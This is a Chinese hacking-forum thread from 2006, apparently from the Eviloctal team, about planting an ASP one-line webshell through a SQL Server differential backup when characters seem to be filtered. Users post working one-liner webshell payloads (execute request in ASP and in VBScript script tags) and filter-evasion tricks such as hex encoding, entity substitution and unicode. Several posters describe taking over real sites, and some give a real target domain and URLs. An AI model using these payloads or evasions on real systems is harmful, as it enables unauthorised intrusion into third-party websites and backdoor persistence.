[讨论]遇到差异备分过滤了<>怎么办?
议题作者:凋凌玫瑰信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
我在差异备后打开的文件显示如下:
Microsoft VBScript 编译器错误 错误 '800a0408'
无效字符
/gbook/test3.asp,行 71
%Execute(request("abc"))%
^
备分的代码是:<%%25Execute(request("ah"))%%25>
好像是"<>"被过滤了
不知道这种情况咋个解决,请高手指点. [s:74] 我遇过
写成"%><%execute request("sb")%><%"这样来试试呢。。 我的写成"%><%execute request("sb")%><%"不行! 为什么不用nbsi3.0的log备份?
getwebshell就很好用..实在要差异备份.
就把一句木马转换成16进制再插入或者加上转义字符试试.还有可以把<>换成%lt;跟%gt;。换成%lt;,%gt;我没试过..不知道行不行...
详细自已到baidu搜搜啦..呵呵.我记不太清楚了 nbsi3.0的log备份试了,根本就写不进去一句话,转换成十六进制也试了,不行. [s:75] 实话告诉你吧,没搞. [s:75] 同意楼上的,楼主为什么不换一个别的思路?能够back了意思是不是DBO的权限,得到了目录呢?为什么不看下别的目录有没有可以利用的东西?如果有别的目录为什么不去下层目录呢?
如果能找到管理员的一个TXT你就应该发了。 *** 作者被禁止或删除 内容自动屏蔽 *** 如果真的过滤了<的话
会提示在那个地方出错??
其实没有过滤的
自己写段代码到ASP里面
看怎么才会出现类似的错误吧。 要是确定是过滤<>了 估计没门了. [quote][b]这里是引用第[/b][color=#ff0000][5 楼][/color][b]的[color=#000066]hack520[/color]于[/b]2006-10-09 22:44[b]发表的:[/b]
[s:75] 实话告诉你吧,没搞. [s:75][/quote]
搞还是有搞,列了下目录我也拿到了websehll,只是我在想这种过滤的方式怎么去突破,因为很少遇到过. 楼上的,既然得了webshell,能否把代码帖出来的?看他什么以什么方式过滤,替换或者是什么的,可能有方法,就跟那个aaspsp似的。。 没可能过滤 <> 过滤了<>,他网站还能运行吗? 估计是%号的原因.
上面都有提示了 % 无效字符.
你试下这个 <script language=VBScript runat=server>execute request("sb")</Script> [quote][b]这里是引用第[/b][color=#ff0000][10 楼][/color][b]的[color=#000066]凋凌玫瑰[/color]于[/b]2006-10-10 10:22[b]发表的:[/b]
搞还是有搞,列了下目录我也拿到了websehll,只是我在想这种过滤的方式怎么去突破,因为很少遇到过.[/quote]
偶滴意思是说,过滤了<>,要是通过bluk,确实木搞。当然咯,搞站大法也不是就这几下吧~~ [s:75] [s:75] 字符转换不行的话就不知道了 我杂遇见的比他还郁闷 我差异悲愤的整个马都消失了 猪三哥帮给看看贝
[url]http://www.czfdcw.com.cn/yejie/text/articleshow.asp?id=14039[/url]
e:\czfdcw.com.cn\
悲愤出来的就没俺的一句话 前后加%><%execute request("#")%><%应是可行的,不过备份后可能又会出新的错误
什么什么无效字符类的提示
如果不行,可以试下lake2的unicode字符 楼上的,话怎么说一半就说了呢
UNICODE具体怎么实现 我提交一句话出现这个问题
Active Server Pages 错误 'ASP 0141'
Page 命令重复
/ken.asp,行 714
@ 命令只能在 Active Server Page 中使用一次。
谁来解释下呢 [quote][b]这里是引用第[/b][color=#ff0000][18 楼][/color][b]的[color=#000066]akens[/color]于[/b]2006-10-23 15:14[b]发表的:[/b]
我提交一句话出现这个问题
Active Server Pages 错误 'ASP 0141'
Page 命令重复
.......[/quote]
估计他asp代码首句是
<%@language=VBScript%>
而你又指定了脚本语言一次. 郁闷呀
我还遇上不能SA不能备份 [s:34] 我遇到的 和你差不多
我的还多一样,就是把我的所有的语句读给写三次
我传个文本上去居然也是三次
我这个的原因估计是我把IIS配置里面的那个防止错误选项勾上了
现在上网不方便也没有深究。
有条件的朋友那个2003实验一下 我一般备份不成功的话就会去尝试列目录找找网站的数据库。然后XXXX [s:75] [url]http://www.czfdcw.com.cn/blog/net.asp[/url]
见多了.. 好搞.
[url]http://www.czfdcw.com.cn/blog/321.asp[/url] [url]http://www.czfdcw.com.cn/blog/111.asp[/url] 看的我头晕了!估计还是我底子太差的原因!努力学习ING! [quote][b]引用第16楼[i]平安年间[/i]于[i]2006-10-22 18:32[/i]发表的[/b]:
前后加%><%execute request("#")%><%应是可行的,不过备份后可能又会出新的错误
什么什么无效字符类的提示
如果不行,可以试下lake2的unicode字符[/quote]
试过了不行。不知道还有什么办法 数据库包含了<%%>吧?? hack520留你联系方式偶蛮喜欢你滴~ 拿下 知道了 是我自己该的体检文件错了地方 1句话不匹配了 NND 我真失败 *** 作者被禁止或删除 内容自动屏蔽 *** 没标点!~哈哈 不是怕服务器累到吗 有错字 习惯了 大家见谅 谁叫我是猪呢 以后我改名字 哈哈 [quote][b]引用第15楼[i]菜菜阿哲[/i]于[i]2006-10-21 21:13[/i]发表的[/b]:
我杂遇见的比他还郁闷 我差异悲愤的整个马都消失了 猪三哥帮给看看贝
[url]http://www.czfdcw.com.cn/yejie/text/articleshow.asp?id=14039[/url]
e:czfdcw.com.cn
.......[/quote]
我有个和你这个一样的,弄了一晚上。要神经了我。。。 [s:40]
搞定的朋友说下做法啊。 [quote][b]引用第15楼[i]菜菜阿哲[/i]于[i]2006-10-21 21:13[/i]发表的[/b]:
我杂遇见的比他还郁闷 我差异悲愤的整个马都消失了 猪三哥帮给看看贝
[url]http://www.czfdcw.com.cn/yejie/text/articleshow.asp?id=14039[/url]
e:czfdcw.com.cn
.......[/quote]
备份成功,不过好象把东西都过滤掉了 [quote]引用第21楼xunix于2006-10-29 06:20发表的 :
我遇到的 和你差不多
我的还多一样,就是把我的所有的语句读给写三次
我传个文本上去居然也是三次
我这个的原因估计是我把IIS配置里面的那个防止错误选项勾上了
现在上网不方便也没有深究。
.......[/quote]
我也是遇到了这个问题~~不知道有没有办法搞定这种情况 可以成功的。 我也遇见过这样的问题,应该是%和<>同时被过滤了,顺便说下NB的getwebshell只是绕过了',不过确实很经典 我也天天这样子
页:
[1]